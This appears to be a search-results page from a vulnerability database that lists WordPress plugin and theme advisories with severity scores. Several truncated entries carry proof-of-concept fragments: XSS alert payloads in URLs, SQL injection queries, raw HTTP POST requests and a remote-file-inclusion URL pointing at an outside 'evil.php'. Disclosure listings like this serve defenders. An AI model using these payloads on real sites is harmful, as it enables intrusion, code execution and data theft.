Wpexploit • Most viewed

4359 matches found

wpexploit • added 2021/10/25 12:00 a.m. • 67 views

Ninja Tables < 4.1.8 - Admin+ Stored Cross-Site Scripting

The plugin does not sanitise and escape some of its table fields, which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed. Create a table, add a column with the following payload " as Name, then add data with the followin...

CVSS 4.8 • AI score 0.9 • EPSS 0.00686
Exploits: 2 • References: 2

wpexploit • added 2021/10/05 12:00 a.m. • 67 views

Perfect Survey < 1.5.2 - Reflected Cross-Site Scripting

The plugin does not sanitise and escape multiple parameters id and filterssessionid of singlestatistics page, type and message of importexport page before outputting them back in pages/attributes in the admin dashboard, leading to Reflected Cross-Site Scripting issues...

EPSS 0.008
Exploits: 2

wpexploit • added 2020/05/28 12:00 a.m. • 67 views

Final Tiles Gallery < 3.4.19 - Authenticated Stored Cross-Site Scripting (XSS)

Multiple cross-site scripting vulnerabilities in Final Tiles Gallery 3.4.18 and lower allow remote attackers to inject arbitrary web script or HTML via the Title and Caption fields of an image. Successful exploitation of this vulnerability would allow an authenticated high-privileged user author+...

CVSS 3.5 • AI score 5.5 • EPSS 0.00892
Exploits: 2

wpexploit • added 2020/01/09 12:00 a.m. • 67 views

TownHub < 1.0.6 - Multiple Vulnerabilities

Multiple vulnerabilities were discovered in the 'TownHub - Directory & Listing WordPress Theme' (tested version v1.0.2): - Unauthenticated XSS - Authenticated Persistent XSS - IDOR Edit WPScanTeam: December 27th, 2019 - Envato Contacted January 5th, 2020 - Envato Investigating January 6th, 2020 -...

CVSS 6.4 • AI score 6.5 • EPSS 0.03243
Exploits: 7 • References: 1

wpexploit • added 2022/04/02 12:00 a.m. • 66 views

Quick Adsense < 2.8.2 - Subscriber+ Post Stats Reset

The plugin does not have authorisation and CSRF checks in some of its AJAX actions, allowing any authenticated user, such as a subscriber, to call them and, for example, reset Posts stats. fetch"/wp-admin/admin-ajax.php", "headers": "accept": "/", "accept-language": "en-US,en;q=0.9", "content-type":...

AI score 1.3
Exploits: 0

wpexploit • added 2022/03/29 12:00 a.m. • 66 views

DW Question & Answer Pro <= 1.3.4 - Multiple CSRF

The plugin does not properly check for CSRF in some of its functions, allowing attackers to make logged in users perform unwanted actions, such as update a comment or a question status. Vendor was notified via Envato on September 28th, 2021, but did not properly fix the issue and was notified...

CVSS 4.3 • AI score 0.4 • EPSS 0.00421
Exploits: 2

wpexploit • added 2022/01/24 12:00 a.m. • 66 views

WP Dependency Installer < 4.3.1 - Subscriber+ Arbitrary Plugin Activation

The wp-dependency-installer library, used in the plugins, does not have authorisation and CSRF checks in its dependencyinstaller AJAX action with the activate method, allowing any authenticated user, such as a subscriber, to activate arbitrary plugins installed on the blog. Furthermore, despite havin...

AI score 1.5
Exploits: 0

wpexploit • added 2021/11/29 12:00 a.m. • 66 views

MOLIE <= 0.5 - Reflected Cross-Site Scripting

The plugin does not escape the courseid parameter before outputting it back in the admin dashboard, leading to a Reflected Cross-Site Scripting issue. https://example.com/wp-admin/admin.php?page=moliecoursecheck&courseid=alert/XSS/...

CVSS 6.1 • AI score 1.2 • EPSS 0.0082
Exploits: 2

wpexploit • added 2021/10/25 12:00 a.m. • 66 views

EditableTable <= 0.1.4 - Admin+ Stored Cross-Site Scripting

The plugin does not sanitise and escape any of the Table and Column fields, which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed. Create a new EDTB and put the following payload in the Table Name, Column Name or Column...

AI score 0.9 • EPSS 0.00588
Exploits: 2

wpexploit • added 2021/05/07 12:00 a.m. • 66 views

Leads-5050 Visitor Insights < 1.0.4 - Unauthenticated License Change

The leads5050setlicense AJAX action was available to unauthenticated users, allowing them to set an arbitrary license in the plugin's settings. POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1 Accept: application/json, text/javascript, /; q=0.01 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip,...

AI score 1.3
Exploits: 0 • References: 1

wpexploit • added 2020/07/28 12:00 a.m. • 66 views

Comments - wpDiscuz 7.0.0 - 7.0.4 - Unauthenticated Arbitrary File Upload

This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable site’s server. POST /wp-admin/admin-ajax.php HTTP/1.1 Host: URL Content-Length: 774 Accept: / X-Requested-With: XMLHttpRequest User-Agent:...

CVSS 7.5 • AI score 1 • EPSS 0.94535
Exploits: 19 • References: 2

wpexploit • added 2017/05/02 12:00 a.m. • 66 views

Avada Theme <= 5.1.4 - Stored Cross-Site Scripting (XSS) & CSRF

Description The Avada WordPress theme was affected by a Stored Cross-Site Scripting XSS & CSRF security vulnerability. http://cdn.wphutte.com/Avada/5.1.4/xss.html http://cdn.wphutte.com/Avada/5.1.4/csrf.html...

CVSS 8.8 • AI score 6.8 • EPSS 0.00907
Exploits: 1 • References: 2

wpexploit • added 2021/12/23 12:00 a.m. • 65 views

WP125 < 1.5.5 - Arbitrary Ad Deletion via CSRF

The plugin does not have CSRF checks in various actions, for example when deleting an ad, allowing attackers to make a logged in admin delete them via a CSRF attack. https://example.com/wp-admin/admin.php?page=wp125addedit&deletead=1...

CVSS 8.8 • AI score 4.4 • EPSS 0.00683
Exploits: 2 • References: 1

wpexploit • added 2021/11/30 12:00 a.m. • 65 views

LiteSpeed Cache < 4.4.4 - IP Check Bypass to Unauthenticated Stored XSS

The plugin does not properly verify that requests are coming from QUIC.cloud servers, allowing attackers to make requests to certain endpoints by using a specific X-Forwarded-For header value. In addition, one of the endpoints could be used to set CSS code if a setting is enabled, which will then ...

CVSS 6.1 • AI score 0.2 • EPSS 0.01216
Exploits: 2

wpexploit • added 2021/10/18 12:00 a.m. • 65 views

Support Board < 3.3.6 - Arbitrary File Deletion via CSRF

The plugin does not have any CSRF checks in actions handled by the include/ajax.php file, which could allow attackers to make logged in users do unwanted actions. For example, make an admin delete arbitrary files...

AI score 1.1 • EPSS 0.00542
Exploits: 2 • References: 1

wpexploit • added 2020/12/09 12:00 a.m. • 65 views

DiveBook <= 1.1.4 - Unauthenticated Reflected XSS

A reflected Cross-Site Scripting vulnerability exists within the DiveBook log's filter functionality. Arbitrary URL parameters are reflected into the application's response, rendered by the browser as HTML or JavaScript. An attacker may abuse this functionality by sending a victim a crafted link...

CVSS 4.3 • AI score 0.4 • EPSS 0.00948
Exploits: 2 • References: 1

wpexploit • added 2020/10/07 12:00 a.m. • 65 views

HyperComments <= 1.2.2 - Unauthenticated Arbitrary File Deletion

The plugin does not validate and sanitise user input which is being concatenated to create a file path, passed to unlink, which leads to an arbitrary file deletion issue. For more details about this issue, please see the reference. File: hypercomments/hypercomments.php:112 $filename =...

AI score 1.2
Exploits: 0 • References: 1

wpexploit • added 2022/04/05 12:00 a.m. • 64 views

Download Monitor < 4.5.91 - Admin+ Arbitrary File Download

The plugin does not ensure that files to be downloaded are inside the blog folders, and not sensitive, allowing high privilege users such as admin to download the wp-config.php or /etc/passwd even in a hardened environment or multisite setup. Create a new download, add a file and put the followi...

CVSS 4.9 • AI score 1.2 • EPSS 0.0093
Exploits: 2

wpexploit • added 2021/12/21 12:00 a.m. • 64 views

Shortcode Addons < 3.1.0 - Unauthenticated Arbitrary Option Update

The plugin does not have any authorisation in its REST API endpoints; one of them could allow unauthenticated attackers to update arbitrary blog options. POST /wp-json/ShortCodeAddonsUltimate/v2/addonssettings HTTP/1.1 Accept: / Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate...

AI score 1.3
Exploits: 0

wpexploit • added 2021/11/29 12:00 a.m. • 64 views

Typebot < 1.4.3 - Admin+ Stored Cross Site Scripting

The plugin does not sanitise and escape the Publish ID setting, which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed. Put the following payload in the "Publish ID or Full URL" setting and save: "...

CVSS 4.8 • AI score 0.9 • EPSS 0.00598
Exploits: 2

wpexploit • added 2021/10/05 12:00 a.m. • 64 views

Perfect Survey < 1.5.2 - Unauthorised AJAX Call to Stored XSS / Survey Settings Update

The plugin does not have proper authorisation nor CSRF checks in the saveglobalsetting AJAX action, allowing unauthenticated users to edit surveys and modify settings. Given the lack of sanitisation and escaping in the settings, this could also lead to a Stored Cross-Site Scripting issue which wi...

AI score 0.6 • EPSS 0.00644
Exploits: 2

wpexploit • added 2020/07/02 12:00 a.m. • 64 views

Payment Form For Paypal Pro < 1.1.65 - Unauthenticated SQL Injection

The 'query' parameter allowed for any unauthenticated user to perform SQL queries with result output to a web page in JSON format. https://example.com/?cffaction=getdatafromdatabase&query=SELECT%20%20from%20wpposts...

CVSS 7.5 • AI score 2 • EPSS 0.9453
Exploits: 1 • References: 1

wpexploit • added 2023/06/20 12:00 a.m. • 63 views

3DPrint < 3.5.6.9 - CSRF to arbitrary file download

Description The plugin does not protect against CSRF attacks in the modified version of Tiny File Manager included with the plugin, allowing an attacker to craft a malicious request that will create an archive of any files or directories on the target server by tricking a logged in admin into...

CVSS 5.3 • AI score 7.1 • EPSS 0.003
Exploits: 2 • References: 1

wpexploit • added 2022/02/17 12:00 a.m. • 63 views

Kunze Law < 2.1 - Admin+ Stored Cross-Site Scripting

The plugin does not escape its 'E-Mail Error "From" Address' settings, allowing high privilege users such as admin to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed. Put the following payload in the 'E-Mail Error "From" Address' settings of the plugin:...

CVSS 4.8 • AI score 0.7 • EPSS 0.00612
Exploits: 2

wpexploit • added 2021/11/29 12:00 a.m. • 63 views

CorreosExpress <= 2.6.0 - Sensitive Information Disclosure

The plugin generates log files which are publicly accessible, and contain sensitive information such as sender/receiver names, phone numbers, physical and email addresses. https://example.com/wp-content/plugins/correos-express/log/logcronfunction.txt...

CVSS 5.3 • AI score 0.5 • EPSS 0.01179
Exploits: 2

wpexploit • added 2020/11/09 12:00 a.m. • 63 views

Ultimate Member < 2.1.12 - Unauthenticated Privilege Escalation via User Roles

Due to the lack of filtering on the role parameter that could be supplied during the registration process, an attacker could supply the role parameter with a WordPress capability or any custom Ultimate Member role and effectively be granted those privileges. $username, 'firstname-'. $formid =...

CVSS 7.5 • AI score 1.6 • EPSS 0.02961
Exploits: 2 • References: 1

wpexploit • added 2020/05/25 12:00 a.m. • 63 views

Official MailerLite Sign Up Forms < 1.4.4 - Unauthenticated SQL Injection

Most methods in the MailerLite plugin do not sanitize user input data which causes SQL injection. Also no single method checks for a nonce token which causes a CSRF issue everywhere. One example would be to inject the payload 1 union all select database,2,3,1,5 into the formid GET parameter of th...

AI score 0.8
Exploits: 0 • References: 1

wpexploit • added 2022/09/27 12:00 a.m. • 62 views

Forym <= 1.5.8 - Reflected Cross-Site Scripting

The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to Reflected Cross-Site Scripting. On a blog having the plugin and the Search Forum Widget active, append the following parameter: ?s="...

AI score 0.2
Exploits: 0 • References: 1

wpexploit • added 2021/12/07 12:00 a.m. • 62 views

10Web Social Photo Feed < 1.4.29 - Reflected Cross-Site Scripting (XSS)

The plugin was affected by a reflected Cross-Site Scripting XSS vulnerability in the wdiapplychanges admin page, allowing an attacker to perform such an attack against any logged in user...

CVSS 6.1 • AI score 3.6 • EPSS 0.008
Exploits: 2

wpexploit • added 2021/12/02 12:00 a.m. • 62 views

Post Duplicator < 2.27 - Admin+ Stored Cross-Site Scripting

The plugin does not sanitise and escape its Duplicate Title and Slug settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed. Put the following payload in the "Duplicate Title" or "Duplicate Slug"...

CVSS 5.4 • AI score 0.4 • EPSS 0.00627
Exploits: 2

wpexploit • added 2021/11/12 12:00 a.m. • 62 views

GRAND FlaGallery <= 6.1.2 - Admin+ Stored Cross-Site Scripting

The plugin does not sanitise and escape some of its gallery settings, which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed. Create/edit a gallery and put the following payload in the "Back Button Text" setting, then...

CVSS 4.8 • AI score 4.9 • EPSS 0.00588
Exploits: 2

wpexploit • added 2021/10/16 12:00 a.m. • 62 views

Speed Booster Pack < 4.3.3.1 - Admin+ SQL Injection

The plugin does not escape the sbpconverttablename parameter before using it in a SQL statement to convert the related table, leading to an SQL injection. https://example.com/wp-admin/admin-ajax.php?action=sbpdatabaseaction&sbpaction=converttables&sbpconverttablename=SQLi&nonce=b2d6208254 The nonc...

CVSS 7.2 • AI score 0.4 • EPSS 0.01112
Exploits: 2 • References: 1

wpexploit • added 2022/04/25 12:00 a.m. • 61 views

Content Egg < 5.3.1 - Reflected Cross-Site Scripting

The plugin does not escape some URLs before outputting them back in attributes, leading to Reflected Cross-Site Scripting. https://example.com/wp-admin/admin.php?page=content-egg-autoblog-edit&a"alert/XSS/...

AI score 0.1
Exploits: 0

wpexploit • added 2018/10/08 12:00 a.m. • 61 views

WPML <= 3.6.3 - Unauthenticated Stored Cross-Site Scripting (XSS)

The sitepress-multilingual-cms WordPress plugin was affected by an Unauthenticated Stored Cross-Site Scripting XSS security vulnerability. POST /wp-admin/admin.php?page=sitepress-multilingual-cms-3.6.3%2Fmenu%2Ftheme-localization.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 Windows NT 6.1...

CVSS 4.3 • AI score 0.6 • EPSS 0.13207
Exploits: 2 • References: 1

wpexploit • added 2022/03/15 12:00 a.m. • 60 views

Easy Social Icons < 3.2.0 - Admin+ Stored Cross-Site Scripting

The plugin does not sanitise and escape its saved settings before outputting them in attributes, which could allow high privilege users to perform Cross-Site Scripting attacks when the unfiltered_html capability is disallowed. 3.1.3 added some escaping, but data was output elsewhere. Put the...

AI score 0.2
Exploits: 0

wpexploit • added 2022/01/11 12:00 a.m. • 60 views

Adaptive Images < 0.6.69 - Reflected Cross-Site Scripting

The plugin does not sanitise and escape the REQUEST_URI before outputting it back in a page, leading to a Reflected Cross-Site Scripting issue. https://example.com/wp-content/plugins/adaptive-images/adaptive-images-script.php/%3Cimg/src/onerror=alert/XSS/%3E/?debug=true...

AI score 1
Exploits: 0 • References: 1

wpexploit • added 2021/11/23 12:00 a.m. • 60 views

HTML5 Responsive FAQ <= 2.8.5 - Admin+ Stored Cross-Site Scripting

The plugin does not properly sanitise and escape some of its settings, which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed. Put the following payload in the "Text size of answer in pixels" settings: alert'XSS'; The XSS will be...

CVSS 4.8 • AI score 4.8 • EPSS 0.00588
Exploits: 2

wpexploit • added 2021/12/06 12:00 a.m. • 59 views

Booking Calendar < 8.9.2 - Reflected Cross-Site Scripting

The plugin does not sanitise and escape the bookingtype parameter before outputting it back in an admin page, leading to Reflected Cross-Site Scripting. https://example.com/wp-admin/admin.php?page=wpbc&bookingtype=%22%3E%3Cimg+src+onerror%3Dalert%28/XSS/%29%3E%3Cscript%3E%2F%2A...

CVSS 6.1 • AI score 0.8 • EPSS 0.008
Exploits: 2

wpexploit • added 2021/12/06 12:00 a.m. • 59 views

Stars Rating < 3.5.1 - Comments Denial of Service

The plugin does not validate the submitted rating, allowing submission of a long integer, causing a Denial of Service in the comments section or the pending comment dashboard, depending on whether the user sent it as unauthenticated or authenticated. Enable rating for a post/page, add a comment, capture the...

CVSS 7.5 • AI score 0.8 • EPSS 0.01553
Exploits: 2

wpexploit • added 2021/12/05 12:00 a.m. • 59 views

Modal Window < 5.2.2 - RFI leading to RCE via CSRF

The plugin within the wow-company admin menu page allows including arbitrary files with a PHP extension, as well as with data:// or http:// protocols, thus leading to CSRF RCE. http://127.0.0.1:8001/wp-admin/admin.php?page=wow-company&tab=https%3A%2F%2Fstatic.kazet.cc%2Fevil.php%3F PHP's...

CVSS 8.8 • AI score 1.4 • EPSS 0.00773
Exploits: 2 • References: 1

wpexploit • added 2021/01/08 12:00 a.m. • 59 views

Modal Survey < 2.0.1.8.2 - Authenticated PHP Object Injection

The Unserialize function is used multiple times in the code, for example when importing custom surveys. This could allow a malicious administrator to import a crafted JSON to trigger a PHP Object Injection vulnerability. "name":"Open Text Answer Sample", "id":"924478511", "options":"", "global":"0...

AI score 0.5
Exploits: 0 • References: 1

wpexploit • added 2020/11/27 12:00 a.m. • 59 views

Age Gate < 2.13.5 - Unauthenticated Open Redirect

The plugin takes the wphttpreferer parameter to redirect users after some actions as well as after invalid or missing nonces, leading to an Unauthenticated Open Redirect issue...

AI score 0.7
Exploits: 0 • References: 1

wpexploit • added 2020/10/09 12:00 a.m. • 59 views

Autoptimize < 2.7.8 - Arbitrary File Upload via "Import Settings"

The plugin attempts to delete malicious files such as .php from the uploaded archive via the "Import Settings" feature, after its extraction. However, the extracted folders are not checked and it is possible to upload a zip containing a directory with a PHP file in it and then it is not remove...

AI score 0.9 • EPSS 0.13139
Exploits: 7

wpexploit • added 2020/02/29 12:00 a.m. • 60 views

Booked < 2.2.6 - Broken Authentication to Export Users Data in CSV

The plugin allows users to Book Appointment by providing their PII such as Email, Name, Phone Number and Personal Message. The vulnerability allows anyone to Dump all records of users and their appointment details in CSV as an unauthenticated user. The user also gets registered as a WP User after...

AI score 7.3
Exploits: 0 • References: 2

wpexploit • added 2022/03/29 12:00 a.m. • 58 views

DW Question & Answer Pro <= 1.3.4 - Arbitrary Comment Edition via IDOR

The plugin does not check that the comment to edit belongs to the user making the request, allowing any user to edit other comments. Vendor was notified via Envato on September 28th, 2021, but did not properly fix the issue and was notified numerous times since. As any authenticated user, post a...

CVSS 4.3 • AI score 0.7 • EPSS 0.00632
Exploits: 2

wpexploit • added 2021/11/23 12:00 a.m. • 58 views

IDPay for Contact Form 7 <= 2.1.2 - Reflected Cross-Site Scripting

The plugin does not sanitise and escape the idpayerror parameter before outputting it back in the page, leading to Reflected Cross-Site Scripting. Append the following payload on a page where a form with an idPay payment interface is embedded: &idpayerror=alert/XSS/ Example:...

CVSS 6.1 • EPSS 0.00788
Exploits: 2

wpexploit • added 2022/04/05 12:00 a.m. • 57 views

Ad Invalid Click Protector (AICP) < 1.2.7 - Reflected Cross-Site Scripting

The plugin does not sanitise and escape the page parameter before outputting it back in an attribute, leading to Reflected Cross-Site Scripting. alert/XSS/' /...

AI score 7
Exploits: 0

wpexploit • added 2022/03/28 12:00 a.m. • 57 views

Shopping Cart & eCommerce Store < 5.2.5 - Arbitrary Design Settings Update via CSRF

The plugin is lacking CSRF checks in various AJAX actions, such as ecadminajaxsavedesignsettings, which could allow attackers to make a logged in admin update arbitrary settings. To disable the Live Design Editor To set the custom CSS setting to body background-color: red;...

AI score 1.2
Exploits: 0

wpexploit • added 2021/12/08 12:00 a.m. • 57 views

PublishPress Capabilities < 2.3.1 - Unauthenticated Arbitrary Options Update to Blog Compromise

The plugin does not have authorisation and CSRF checks when updating the plugin's settings via the init hook, and does not ensure that the options to be updated belong to the plugin. As a result, unauthenticated attackers could update arbitrary blog options, such as the default role and make any...

CVSS 9.8 • AI score 0.6 • EPSS 0.06745
Exploits: 2 • References: 1

wpexploit • added 2021/07/12 12:00 a.m. • 57 views

Page View Counts < 2.4.9 - Contributor+ Stored XSS

The plugin does not escape the postid parameter of pvcstats shortcode, allowing users with a role as low as Contributor to perform Stored XSS attacks. A post made by a contributor would still have to be approved by an admin to have the XSS triggered in the frontend, however, higher privilege user...

CVSS 3.5 • AI score 1.7 • EPSS 0.00624
Exploits: 2

Total number of security vulnerabilities: 4359